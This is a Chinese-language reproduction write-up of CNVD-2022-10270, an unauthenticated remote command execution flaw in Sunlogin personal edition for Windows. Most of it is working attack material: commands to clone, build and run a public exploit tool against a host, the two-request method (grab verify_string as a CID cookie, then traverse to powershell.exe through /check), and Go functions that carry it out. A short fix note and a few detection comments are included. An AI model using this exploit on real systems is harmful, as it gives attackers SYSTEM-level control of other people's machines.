CNVD-2022-10270 通告:向日葵个人版 for Windows 存在命令执行漏洞。攻击者可以通过此漏洞在目标主机上以 SYSTEM 权限执行任意命令,从而获取服务器控制权。
复现所用的向日葵版本:11.0.0.33826
EXP
//EXP工具编译 git clone https://github.com/heyzm/sunlogin_rce_.git cd sunlogin_rce_/ go build main.go //扫描,得到端口49686 ./main -h 192.168.6.6 //rce,目标主机D盘下将生成test.go文件 ./main -c "echo 'hello world' >d:test.go" -h 192.168.6.6 -p 49686 -t rce原理
通过 /cgi-bin/rpc?action=verify-haras 获取 CID(响应中的 verify_string 字段),从而解决认证问题
通过 /check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+<命令> 构造 RCE(目录穿越至 powershell.exe)
// GetVerify issues an unauthenticated GET to /cgi-bin/rpc?action=verify-haras
// on the target (host and port from config) and returns the "verify_string"
// field of the JSON response. RunCmd later sends that value back as the CID
// cookie. Returns "" on any transport error.
//
// NOTE(review): no credentials are sent with this request, so the fact that
// it yields a usable verify string is the authentication weakness; a request
// to this path is the first observable indicator for detection.
func GetVerify() string { // fetch the verify string used for authentication
client := resty.New().SetTimeout(3 * time.Second).SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) // 3s timeout; TLS verification disabled (the URL below is plain http, so this config is not exercised)
resp, err := client.R().EnableTrace().Get("http://" + config.GetIp() + ":" + config.GetPort() + "/cgi-bin/rpc?action=verify-haras")
if err != nil {
//log.Println(err)
return "" // transport failure: the caller receives an empty verify string
}
str := resp.Body()
body := string(str)
verify := fmt.Sprintf("%s", gjson.Get(body, "verify_string")) // %s on a gjson.Result yields its string value
return verify
}
// RunCmd sends one command to the target's /check endpoint and returns the
// raw response body ("" on transport error). The cmd query parameter is
// "ping" followed by nine "..%2F" segments that traverse to
// windows/system32/WindowsPowerShell/v1.0/powershell.exe, with the
// caller-supplied command appended after "+" (a space once URL-decoded).
// Authentication is the CID cookie obtained from GetVerify.
//
// NOTE(review): from a detection standpoint, the "/check?cmd=ping..%2F"
// prefix together with a "Cookie: CID=" header on the same request is the
// observable pattern of this technique.
func RunCmd(cmd string) string {
client := resty.New().SetTimeout(3 * time.Second).SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) // 3s timeout; TLS verification disabled (unused: the URL below is plain http)
//fmt.Printf(GetVerify())
cmd = url.QueryEscape(cmd) // percent-encode the command so it is carried as a single query value
client.Header.Set("cookie","CID="+GetVerify()) // GetVerify returns "" on failure; the cookie is then sent as a bare "CID="
resp, err := client.R().EnableTrace().Get("http://" + config.GetIp() + ":" + config.GetPort() + "/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+" + cmd)
if err != nil {
//log.Println(err)
return "" // transport failure
}
str := resp.Body()
body := string(str)
return body // response body returned verbatim; what the service puts in it is not shown here
}
修复
更新到官网最新的 V 12.5.0.44227(2022.02)版本
参考:https://ckcsec.cn/posts/5047f5b7/



